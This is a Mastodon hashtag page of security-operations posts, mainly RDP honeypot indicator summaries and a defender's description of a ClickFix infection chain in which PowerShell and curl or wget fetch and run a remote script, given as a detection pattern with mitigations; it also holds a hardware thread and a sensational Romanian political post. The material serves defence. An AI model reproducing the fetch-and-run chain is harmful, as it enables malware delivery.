Create accountLogin

Recent searches

No recent searches

Search options

Only available when logged in.
veganism.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
Veganism Social is a welcoming space on the internet for vegans to connect and engage with the broader decentralized social media community.

Administered by:

Server stats:

202
active users

veganism.social: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.4.0-alpha.4

#soc

9 posts8 participants1 post today
Public
RDP Snitch

2025-04-27 RDP #Honeypot IOCs - 10322 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
161.97.77.37 - 8850
159.89.6.147 - 1300
80.94.95.198 - 40

Top ASNs:
AS51167 - 8850
AS14061 - 1344
AS204428 - 42

Top Accounts:
hello - 10202
142.93.8.59 - 74
Test - 12

Top ISPs:
Contabo GmbH - 8850
DigitalOcean, LLC - 1344
SS-Net - 42

Top Clients:
Unknown - 10322

Top Software:
Unknown - 10322

Top Keyboards:
Unknown - 10322

Top IP Classification:
hosting - 10188
Unknown - 102
hosting & proxy - 32

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/pSETBRE9

Pastebin2025-04-27_stats.json - Pastebin.comPastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
#CyberSec#SOC#Blueteam
Public
Saltmyhash

Examine your EDR telemetry or other process command logs for the following #clickfix flow:

Explorer.exe -> powershell.exe -> cmd.exe -> curl/wget to grab a .ps1 -> powershell.exe

The above flow was initiated using a Cloudflare Captcha challenge on a compromised website which fooled the victim into running the clipboard command. Also, look out for internet traffic which sources from copilot.exe. It won’t have a referrer in proxy logging which made figuring out where or how the victim initially hit the clickfix domain difficult. EDR telemetry ultimately showed copilot.exe making the initial netconn to the clickfix domain. Microsoft purview analysis of copilot was needed to figure out what the victim entered in the prompt to drive them to compromised site hosting the clickfix payload.

Mitigation is to recommend restricting cmd.exe or powershell.exe execution to privileged groups only. Bob in the C-suite shouldn’t be able to use run to execute cmd.exe commands copied to his clipboard. Scope usage of cmd/powershell so you don’t blow up legitimate patching or remote assistance efforts. Also, know if copilot is on in your org and restrict or create privileged groups who need it.

Almost every threat actor I track now is using clickfix technique, apparently because it works. Users are more than happy to self-diagnose problems or solve bogus captchas by doing what prompts tell them to do.

#soc#threatintelligence#dfir
Public
RDP Snitch

2025-04-24 RDP #Honeypot IOCs - 6872 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
191.96.106.18 - 3132
212.56.53.170 - 1635
152.230.66.217 - 992

Top ASNs:
AS174 - 3132
Unknown - 1671
AS14259 - 992

Top Accounts:
hello - 6650
142.93.8.59 - 114
Test - 36

Top ISPs:
Cogent Communications - 3132
VPN Consumer Ashburn - 1635
Gtd Internet S.A. - 992

Top Clients:
Unknown - 6872

Top Software:
Unknown - 6872

Top Keyboards:
Unknown - 6872

Top IP Classification:
proxy - 3132
Unknown - 2804
hosting - 921

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/q3xUP7AD

Pastebin2025-04-24_stats.json - Pastebin.comPastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
#CyberSec#SOC#Blueteam
Replied in thread
Public
Kevin Karhan :verified:

@k4m1 @stman yeah, according to the #RTL8139 #datasheet this is basically a very cheap 10/100M NIC designed #embedded systems and low-end/low-cost desktops, and for a device designed and sold in 2006 it made sense, given back then #Gigabit-#Ethernet and Cat.5 cabling was considered high-end.

  • And unlike contemporary / successor chips by #Intel like the famous #i210 (which is still offered as #i219 but mostly succeeded by the #i225 as a 2,5GBase-T version) is way cheaper, which pre-#RoHS - NICs being sold for like € 10 retail & brand-new....

The few issues known only affect like #Virtualization setups, a market this thing was never designed for (most likely also never tested against).

  • I'd not he surprised if a lot of cheap #ThinClients and other systems used these NICs because of the simplicity of integration, being a cheap 3,3V single-chip (+auxilliary electronics) solution and propably costling less than 10¢ on a reel of 10.000.

It's the reason why to this day we see #Realtek NICs being shipped instead of fanning-out & enabling #SoC-integrated NICs with a #MAC & #PHY instead: Because the auxilliary parts for those are more expensive than just getting a PCI(e lane) somewhere and plonking it down.

  • Maybe there have even been some really cheap, low-end #Routers / #Firewalls aiming at #SoHo customers back in those days, cuz back then 16MBit/s #ADSL2 was considered fast, and Realtek's NICs up until recently only delivered like 60-75% of the max. speed advertised, so by the time someone would notice, that gearvwould've been EoL'd anyway and those who did notice right-away never were the target audience to begin with.

Most modern NICs are more complex and demand more configuration / driver support...

Public
Saltmyhash

This NLRB whistleblower complaint is a horror story for any CERT team. As a CTI/SOC analyst, if I see spawned powershell invoking web requests to some random-ass AI API reverse-engineering tool/headless browser repository, large outbound byte transfers measured in GBs, or conditional access policies/MFA being tampered with, you’re getting isolated and we’re standing up an incident response bridge. Also, someone on your team has an info stealer on their device if they’re seeing attempted logins from a foreign country within fifteen minutes of account creation.

This is an insider threat case of the worst kind: one your security team gets to watch but can’t do a damn thing to stop.

arstechnica.com/tech-policy/20

whistlebloweraid.org/wp-conten

#cti#soc#threatintel
Public
newsrous

🚨 Șocant! Potrivit unui articol recent, Trump ar vrea să deporteze cetățeni americani în străinătate. 🤯 Ați citit bine! Articolul susține că "cei autohtoni sunt următorii" și că Trump speră să încarcereze cetățeni americani în țări străine. Cum e posibil așa ceva? 🤔 Află mai multe detalii despre această informație explozivă în articol!

#Trump #Deportare #PoliticaAmericana #Soc #CetateniAmericani #Incarcerare

Citește mai mult: newsro.us/politics/trump-vrea-

Public
RDP Snitch

2025-04-15 RDP #Honeypot IOCs - 8100 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
156.146.57.47 - 5064
156.146.57.181 - 2304
222.100.239.9 - 450

Top ASNs:
AS212238 - 7368
AS4766 - 483
AS48721 - 63

Top Accounts:
hello - 7836
142.93.8.59 - 177
Administr - 27

Top ISPs:
Datacamp Limited - 7368
Korea Telecom - 483
Flyservers S.A. - 63

Top Clients:
Unknown - 8100

Top Software:
Unknown - 8100

Top Keyboards:
Unknown - 8100

Top IP Classification:
hosting & proxy - 7371
Unknown - 657
hosting - 54

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
pastebin.com/ZsnpxT0s

Pastebin2025-04-15_stats.json - Pastebin.comPastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
#CyberSec#SOC#Blueteam
VegansExploreLive feeds
About